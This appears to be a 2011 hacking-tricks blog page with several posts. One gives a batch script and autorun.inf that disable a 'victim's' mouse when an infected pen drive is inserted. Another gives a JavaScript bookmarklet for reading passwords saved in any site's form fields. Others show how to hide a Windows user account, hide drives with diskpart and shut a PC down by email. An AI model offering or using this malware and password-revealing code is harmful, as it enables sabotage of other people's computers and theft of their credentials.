Categories

Wednesday, March 2, 2011

Trick to make disable victim's mouse whenever he inserts pendrive........... Try it

Trick to Disable Victim's Mouse
This trick will make you disable victim's mouse whenever he inserts pen-drive. You can call it as virus which will disable the mouse.

This virus will be created using simple Batch programming. This post will not only offer you the code but also will also explain that Batch program.
-------------------------------------------------------------------------------------------------

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
-------------------------------------------------------------------------------------------------
Explanation about this code

"@echo off" This command will either turn ON, or OFF the command you put in a batch file from showing itself on screen.

setkey="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" will access the registry stored in the location"HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
The third line of our code is "reg delete %key%”. This will delete the key in the MouseClass from registry.

"reg add %key% /v Start /t REG_DWORD /d 4" creates a new key with
Binary value name as "start" ,type is "REG_DWORD"
and data as "4" (actually the four will be stored in hexadecimal format, 0×00000004).

The Procedure to create this virus:

Step 1: 
1. Copy the Batch code into notepad.
2. Save it as .bat extension (for eg: clickme.bat)

Step 2: 
Now open the notepad and copy this code:
------------------------------------------
[autorun]
Open=filename.bat
Action=Mouse Disable
-----------------------------------------
Save it as "autorun.inf"

//don't forget to change the "filname.bat" with your filname.bat.

Step 3: 
Then copy the two files in your pen drive or victim's pen drive.


That's all we have finished. Now make the victim to insert that infected pen drive and that’s all, now the victim’s mouse is disabled.

How to recover from this attack?
In case you yourself get infected with this attack then to recover from this attack, you can follow these simple steps:

Copy this code into the notepad:
-------------------------------------------------------------------------------------------------
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1
-------------------------------------------------------------------------------------------------

and save it with .bat extension(for eg: release.bat).
Now final step is to double click this batch will and it will re-enable the mouse actions.

ShutDown your Computer by ur cellphone

ShutDown your Computer by ur cellphone

Using this method, a user can shutdown, restart, hibernate, etc. his or her computer, just by sending an email from his or her phone.

To do this, all you will need is Microsoft
 Outlook which should come with Microsoft Office, which most people have. This will need to be on the computer wish you wish to shutdown.

So, this is how you do this:

1.
 First, you need the batch files to perform the Shutdown, Hibernate etc. You can write them down yourselves

2.
 open your note pad
and write like this...
c:\windows\system32\shutdown -s -f -t 00
and save it as shutdown.bat

3.
 Open up Microsoft Outlook. Make sure that you have already configured it for your email.Now we will need to make it so that Outlook checks your inbox about every minute (1 minute for testing time can be increased if a delayed shutdown is desired). You can do this by going to Tools: Options.

4.
 Then click the Mail Setup tab, and afterward, the Send/Receive button.

5.
 Make sure that the Schedule an automatic send/receive every... box is checked, and set the number of minutes to 1. Now you may close all of these dialog boxes.

6.
 Now go to Tools: Rules and Alerts... Next click the options button in the upper right hand corner and press the Import Rules button.

7.
 Now select the shutdown.bat file ...which u have created ...

8.
 Now, when you send a message from your phone to your e-mail address with the subject shutdown or smsshutdown%%, your computer will shutdown.

Tips:
Use of any of the Isolated or dead E-mail address or any e-mail will shutdown your computer.

I hope you like it 
by PrAjEsH
Please Comment about it

Read Anyone’s Password Easily : Hack


Read Anyone’s Password Easily : Hack

As you can see there exist a line of password in asterick form in the password field. Let’s say you are so desperate to read that line of password but you have no idea how to do it. You can’t copy and paste the password to Notepad, it won’t show the password.

Don’t worry you don’t have to be a computer freak, all you need to do is to copy the following javascript code and paste it into your address bar that contains the password. Then hit Enter to reveal the password. That’s it.

------------------------------------------------------------------------------------------------------------------------

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s + "http://www.borntohack.in"); else alert("There are no passwords in forms on this page.");})();

------------------------------------------------------------------------------------------------------------------------

Note: this trick is applicable on all websites on the Internet

The computer system is always that fragile, so I highly recommend you not to save your password in any public computers. Now you learn something new about your password today. Please share this piece of information with your friends and do consider to bookmark us, it might be useful for you.

Make Invisible User Account in XP


Make Invisible User Account in XP

If you want to hide your account from the Windows Log-on screen or create a new fresh invisible one just do the following:

1. Go to Control Panel and create a NEW_ACCOUNT inside User Accounts
2. Go to START->RUN–type in regedit–
3. Carefully go to the following destination;
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WinLogon\SpecialAccounts\UserList
4. Here create a new DWORD by right clicking and name it as you did your NEW_ACCOUNT. If you want to hide an existing one, just type in its name.
5. The value of the DWORD has to be zero if you want it to be hidden. If you want it to show, just change the value to 1.
6. Now log off and see that your account is not in the logon screen.
7. To logon to your hidden account press CTRL+ALT+Delete twice. Here type in your NEW_ACCOUNT and that’s it

Hide Any Drive In Window 7/ Windows Vista 3 Steps...

Hide Any Drive In Windows7/Vista 3 Steps...
Most of you must have wondered if there exists a way without using software to Hide A Drive completely so that it cannot be viewed or accessed without unlocking it. Well for those who have and who haven't yet, here is a easiest method on How To Hide Any Drive In Just 3 Steps.

Here we go, follow these 3
 simple steps:

01. Go To Start --> Run or use Win+R keys and type "cmd" and press Ok.

02. This will open Command Prompt for you. Now type "diskpart" and press Enter:

Once in Diskpart type "list volume" and press Enter:

This will list all the partitions in ur system.

Enter The Following Command
"select volume 10".

Remember to change 10 with the volume number of your partition you want to hide and press Enter:

03. Now as in my example I am hiding drive G: so my last command is "remove letter G" and then press Enter:

All done. Now open your computer and see that drive is made hidden

Now to make a drive Unhidden

Follow first 2 steps as such but in step 3 instead of remove letter G use "assign letter G"

For Vista/Windows 7

The commands becomes slightly different here:"assign letter=G"

You have
 successfully unlocked the Hidden Drive.